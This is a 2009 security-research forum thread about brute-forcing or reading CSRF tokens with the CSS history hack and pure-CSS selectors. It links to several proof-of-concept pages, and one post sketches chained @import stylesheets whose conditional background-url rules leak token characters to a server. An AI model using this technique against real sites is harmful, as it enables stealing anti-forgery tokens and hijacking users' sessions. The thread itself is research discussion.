Cenzic 232 Patent
Paid Advertising
sla.ckers.org is
ha.ckers sla.cking
Sla.ckers.org
Q and A on cross site request forgeries and breaking into sessions. It's one of the attacks that XSS enables and the attack of the future. For Session, fixations, hijacking, lockout, replay, session riding etc.... 
Go to Topic: PreviousNext
Go to: Forum ListMessage ListNew TopicSearchLog In
Hacking CSRF tokens using CSS History Hack
Posted by: Inferno
Date: July 18, 2009 01:12AM

Hi Ha.ckers,

i came up with this idea of brute forcing csrf token using css history hack and want to get your opinions on it. currently it works ok to brute force tokens of 5 chars length, might be feasible in future for longer tokens - http://securethoughts.com/2009/07/hacking-csrf-tokens-using-css-history-hack/

-
Inferno
SecureThoughts.com

Options: ReplyQuote
Re: Hacking CSRF tokens using CSS History Hack
Posted by: clayfox
Date: July 18, 2009 04:52PM

I don't think that will work for nonces, but for persistent tokens that could be a great idea. One problem with the usual brute force techniques is that your invalid attempts get logged. This would be a way around that since it wouldn't hit the site you are attacking, just the user.

This wouldn't work for nonces, because they will only show up once they are used.

-clayfox

Options: ReplyQuote
Re: Hacking CSRF tokens using CSS History Hack
Posted by: Inferno
Date: July 18, 2009 06:12PM

For nonces, it depends. Many systems allow older nonces in the active user session to support back and forward browser buttons. If that is the case, then yes, this technique would work. Otherwise, no.

-
Inferno
SecureThoughts.com

Options: ReplyQuote
Re: Hacking CSRF tokens using CSS History Hack
Posted by: clayfox
Date: July 20, 2009 08:19AM

Nonce is the combination the words "Number" and "Once". A nonce by definition is only used once, otherwise it is generally referred to as a token or key. Systems that allow that sort of behavior are using tokens, not nonces.

-clayfox

Options: ReplyQuote
Re: Hacking CSRF tokens using CSS History Hack
Posted by: Gareth Heyes
Date: July 20, 2009 09:23AM

sirdarckcat demo'd a better technique just using CSS no javascript:-
http://sla.ckers.org/forum/read.php?13,25016

------------------------------------------------------------------------------------------------------------
"People who say it cannot be done should not interrupt those who are doing it.";
labs : [www.businessinfo.co.uk]
blog : [www.thespanner.co.uk]
Hackvertor : [hackvertor.co.uk]

Options: ReplyQuote
Re: Hacking CSRF tokens using CSS History Hack
Posted by: Inferno
Date: July 20, 2009 10:37AM

@Gareth, thanks for pointing this ! using CSS PoC is better than my javascript, and works even when someone completely disables javascript :). can you please share the source code for this php page - http://sla.ckers.org/files/css_tokens.php. can you please put a download link here or send to my email id Inferno {at} SecureThoughts.com

-
Inferno
SecureThoughts.com

Options: ReplyQuote
Re: Hacking CSRF tokens using CSS History Hack
Posted by: Gareth Heyes
Date: July 20, 2009 11:12AM

http://www.businessinfo.co.uk/labs/css_token_stealer/css_tokens.zip

------------------------------------------------------------------------------------------------------------
"People who say it cannot be done should not interrupt those who are doing it.";
labs : [www.businessinfo.co.uk]
blog : [www.thespanner.co.uk]
Hackvertor : [hackvertor.co.uk]

Options: ReplyQuote
Re: Hacking CSRF tokens using CSS History Hack
Posted by: Inferno
Date: July 20, 2009 03:12PM

@Gareth,

I think you are missing the point in my attack. Sirdarckcat's work is on a entirely different side and it requires active css injection in the form page. My technique is based on css history hack by Jeremiah and it does not require any injection.

Thanks,
Inferno

-
Inferno
SecureThoughts.com

Options: ReplyQuote
Re: Hacking CSRF tokens using CSS History Hack
Posted by: Gareth Heyes
Date: July 20, 2009 04:10PM

@Inferno

I think you are misunderstanding my point, using CSS selectors it's possible to accomplish the same thing and I posted the technique a while ago:-

http://www.businessinfo.co.uk/labs/css_scripting_kit/css_scripting_kit.php

Sirdarckcat took it a stage further by using CSS to examine the values.

------------------------------------------------------------------------------------------------------------
"People who say it cannot be done should not interrupt those who are doing it.";
labs : [www.businessinfo.co.uk]
blog : [www.thespanner.co.uk]
Hackvertor : [hackvertor.co.uk]

Options: ReplyQuote
Re: Hacking CSRF tokens using CSS History Hack
Posted by: Inferno
Date: July 20, 2009 04:46PM

Gareth,

I am getting your point now, with the last PoC it was a little unclear. So, yes, my PoC can be improved to be pure CSS based without js.

However, i still feel that pure CSS attack might be more problematic because your html file size will be very long, since it will contain all the brute force values. a base16 5 length long token will have key space 1048576. Any way to overcome this ?

But still pure CSS is very very innovative approach found by sirdarckcat and you.

-
Inferno
SecureThoughts.com

Options: ReplyQuote
Re: Hacking CSRF tokens using CSS History Hack
Posted by: Gareth Heyes
Date: July 20, 2009 05:26PM

@Inferno

Yeah sirdarckcat and Stefano Di Paola found you could link stylesheets together to brute force the key faster by reading pairs of keys using the @import command

------------------------------------------------------------------------------------------------------------
"People who say it cannot be done should not interrupt those who are doing it.";
labs : [www.businessinfo.co.uk]
blog : [www.thespanner.co.uk]
Hackvertor : [hackvertor.co.uk]

Options: ReplyQuote
Re: Hacking CSRF tokens using CSS History Hack
Posted by: sirdarckcat
Date: July 21, 2009 05:08AM

http://eaea.sirdarckcat.net/css-sib/urlbruteforce.php
http://eaea.sirdarckcat.net/cssar/v2/
http://eaea.sirdarckcat.net/csschallenge.html
http://eaea.sirdarckcat.net/cssh-mon/cssh-mon.php
etc...
http://p42.us/css

--------------------------------
http://sirdarckcat.blogspot.com/ http://www.sirdarckcat.net/ http://foro.elhacker.net/ http://twitter.com/sirdarckcat

Options: ReplyQuote
Re: Hacking CSRF tokens using CSS History Hack
Posted by: rvdh
Date: July 21, 2009 07:47AM

Have to agree that SDC and Gaz came with these things.

btw if you research something don't you Google for it FIRST? This way you don't indulge into stuff that has been researched already, saves you a lot of time to research other things.

Options: ReplyQuote
Re: Hacking CSRF tokens using CSS History Hack
Posted by: Inferno
Date: July 21, 2009 09:18AM

@sirdarckcat - thanks for improved PoCs with pure CSS.

@rvdh, i do google things before writing them up. believe me or not, the concept was not discussed anywhere else before. people knew the history hack to check visited websites only. If you still don't believe, try to find this PoC in google - http://eaea.sirdarckcat.net/css-sib/urlbruteforce.php.

What i should have done is to improve my PoC which currently uses a combination of css and js(old one). My PoC could be much better developed using Sirdarckcat's and Gareth's techniques using pure CSS and i totally agree.

@sirdarckcat - if you have some time, can you please show us the way to link multiple spreedsheets together which Gareth pointed could brute force keys faster. Can you please try to see how much time it takes on 5 or 6 digit base 16 keyspace. I wanted to add your reference in my post, alongwith your improved PoC and some time readings.

-
Inferno
SecureThoughts.com

Options: ReplyQuote
Re: Hacking CSRF tokens using CSS History Hack
Posted by: Anonymous User
Date: July 21, 2009 12:20PM

http://www.heise.de/security/Schutz-vor-Attacken-durch-Cross-Site-Request-Forgery-ausgehebelt--/news/meldung/142272

In Germany you're a star already ;)

Options: ReplyQuote
Re: Hacking CSRF tokens using CSS History Hack
Posted by: Inferno
Date: July 21, 2009 12:54PM

3x.thanks mario for posting

-
Inferno
SecureThoughts.com

Options: ReplyQuote
Re: Hacking CSRF tokens using CSS History Hack
Posted by: sirdarckcat
Date: July 22, 2009 10:18AM

Actually you are right almost all this CSS stuff are either on the talk we gave at bluehat (that wasnt very famous), and we later published the ppt, or in some google group, or I dont remember haha.. I posted some of this stuff in my blog, and gareth on his, and thornmaker also... We'll probably do a whitepaper or something like that.. just after this crazy university/start-working/talk/ppt/talk/etc.. things finish happening.. Im presenting at blackhat next week and 2 weeks after that on xcon, and well.. after that I will finally have time (and a motivation to start writing about all this and other things I left unfinished last year).

I think that all xss filters are blocking just javascript :) and that's cool since in some time we will start seeing how CSS-based attacks start appearing.

The PoC that is not on google (urlbruteforce.php) is not on google because it was distributed on a .zip, that was made by gareth last year or something like that.. Sadly google doesn't index zip files (yet).

The linking multiple stylesheets together was about using @import rules that where conditioned to the result of another rule.. This is used on the first version of the attribute reader that can be found on p42.us/css

The idea is.. having a:
<style>
@import "/?fetch-first-rules";
</style>
and fetch-first-rules has:

condition1{
background:url(/?b=condition1);
}
condition2{
background:url(/?b=condition2);
}
condition3{
background:url(/?b=condition3);
}


and then
<style>
@import "/?fetch-new-rules";
</style>

the fetch-new-rules stylesheet depend on if either which of condition 1, 2 or 3 were triggered.

You can then expand this approach by importing other stylesheets inside each imported rule, each one of them conditioned to the result of previous rules.

So, the general idea is.. you have N imports
1.- the first import will return you a histogram of the chars (eg. '0'x2,'5'x1,'6'x7, etc..)
2.- the second import will try to match and count the ocurrences of pairs of chars (eg. 00 01 05 06 56 66 etc..)
3.- the third import will try to match and count the ocurrences of each possible matched pair (eg. 0056 0066 6600 6656 6665 5600 5666 etc)
4.- the forth import will try to match and count the ocurrences of each possible matched pair of pairs. (eg. 0056 6666)
5.- the fifth import will know that the value is either one of several possible values, so it will send a try for exact matches (eg. the only possible one is 0056666666).

It's important to consider that the amount of imports needed and comparisons depend on the algorithm, and the string.

So, to answer your question:
> Can you please try to see how much time it takes on 5 or 6 digit base 16 keyspace.

It depends on the string (the base is irrelevant either base 2 or base 64 its the same), it can be either one style sheet matching single ocurrences (like 012345 that is best case scenario) or in the worst case scenario.. for 6 chars, it could be 3 very big includes (its pretty easy actually) or several smaller includes. (so, you have either 3 big stylesheets or 5 small stylesheets).

When it gets complicated is when the base exceeds the length of the string (base 16 with 32 chars for example), since then the algorithm is more complex when matching single occurrences.

Check the PoC's algorithms and the PPT..

Greetings!!

--------------------------------
http://sirdarckcat.blogspot.com/ http://www.sirdarckcat.net/ http://foro.elhacker.net/ http://twitter.com/sirdarckcat



Edited 9 time(s). Last edit at 07/22/2009 10:36AM by sirdarckcat.

Options: ReplyQuote
Re: Hacking CSRF tokens using CSS History Hack
Posted by: rvdh
Date: July 22, 2009 11:10AM

I find plenty of stuff on Google, including CSS CSRF.

btw, click jacking has been done months before RSnake:

http://own-the.net/poc/digg_csrf/index.html

I don't assume people raid other people's work (although I DO seen that quite a lot since this field is running short on P0C's I guess) But if you know how to use your search engine properly you will find most research, or approximations to it.

When i start on something I usually spend countless hours to look for data that is known, unknown because it not only saves me time, it also prevents that other people will (right or wrongfully) accuse you of something, and you can reference to it.

Options: ReplyQuote


Sorry, only registered users may post in this forum.